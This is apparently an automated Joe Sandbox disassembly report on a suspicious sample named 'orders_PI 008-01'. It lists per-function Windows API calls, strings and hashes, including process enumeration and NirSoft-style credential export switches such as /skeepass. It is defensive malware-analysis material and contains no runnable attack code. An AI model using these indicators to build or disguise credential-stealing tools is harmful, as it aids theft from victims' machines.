                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • memset.MSVCRT ref: 004085CF
                                        • memset.MSVCRT ref: 004085F1
                                        • memset.MSVCRT ref: 00408606
                                        • strcmp.MSVCRT ref: 00408645
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                        • memset.MSVCRT ref: 0040870E
                                        • strcmp.MSVCRT ref: 0040876B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                        • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                        • String ID: ---
                                        • API String ID: 3437578500-2854292027
                                        • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                        • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                        APIs
                                        • memset.MSVCRT ref: 0041087D
                                        • memset.MSVCRT ref: 00410892
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                        • DeleteObject.GDI32(?), ref: 004109D0
                                        • DeleteObject.GDI32(?), ref: 004109D6
                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                        • String ID:
                                        • API String ID: 1010922700-0
                                        • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                        • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                        APIs
                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                        • malloc.MSVCRT ref: 004186B7
                                        • free.MSVCRT ref: 004186C7
                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                        • free.MSVCRT ref: 004186E0
                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                        • malloc.MSVCRT ref: 004186FE
                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                        • free.MSVCRT ref: 00418716
                                        • free.MSVCRT ref: 0041872A
                                        • free.MSVCRT ref: 00418749
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$FullNamePath$malloc$Version
                                        • String ID: |A
                                        • API String ID: 3356672799-1717621600
                                        • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                        • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 2081463915-1959339147
                                        • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                        • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                        • API String ID: 2012295524-70141382
                                        • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                        • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                        • API String ID: 667068680-3953557276
                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                        APIs
                                        • GetDC.USER32(00000000), ref: 004121FF
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                        • SelectObject.GDI32(?,?), ref: 00412251
                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                        • SetCursor.USER32(00000000), ref: 004122BC
                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                        • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                        • String ID:
                                        • API String ID: 1700100422-0
                                        • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                        • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                        • String ID:
                                        • API String ID: 552707033-0
                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                        • strchr.MSVCRT ref: 0040C140
                                        • strchr.MSVCRT ref: 0040C151
                                        • _strlwr.MSVCRT ref: 0040C15F
                                        • memset.MSVCRT ref: 0040C17A
                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                        • String ID: 4$h
                                        • API String ID: 4066021378-1856150674
                                        • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                        • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf
                                        • String ID: %%0.%df
                                        • API String ID: 3473751417-763548558
                                        • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                        • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                        • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                        • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                        APIs
                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                        • GetTickCount.KERNEL32 ref: 0040610B
                                        • GetParent.USER32(?), ref: 00406136
                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                        • String ID: A
                                        • API String ID: 2892645895-3554254475
                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                        APIs
                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                        • memset.MSVCRT ref: 0040DA23
                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                        • String ID: caption
                                        • API String ID: 973020956-4135340389
                                        • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                        • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                        • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                        • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                        APIs
                                        Strings
                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf$wcscpy
                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                        • API String ID: 1283228442-2366825230
                                        • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                        • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                        • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                        • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                        APIs
                                        • wcschr.MSVCRT ref: 00413972
                                        • wcscpy.MSVCRT ref: 00413982
                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                        • wcscpy.MSVCRT ref: 004139D1
                                        • wcscat.MSVCRT ref: 004139DC
                                        • memset.MSVCRT ref: 004139B8
                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                        • memset.MSVCRT ref: 00413A00
                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                        • wcscat.MSVCRT ref: 00413A27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                        • String ID: \systemroot
                                        • API String ID: 4173585201-1821301763
                                        • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                        • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                        • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                        • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                        • API String ID: 1284135714-318151290
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                        • String ID: 0$6
                                        • API String ID: 4066108131-3849865405
                                        APIs
                                        • memset.MSVCRT ref: 004082EF
                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • memset.MSVCRT ref: 00408362
                                        • memset.MSVCRT ref: 00408377
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
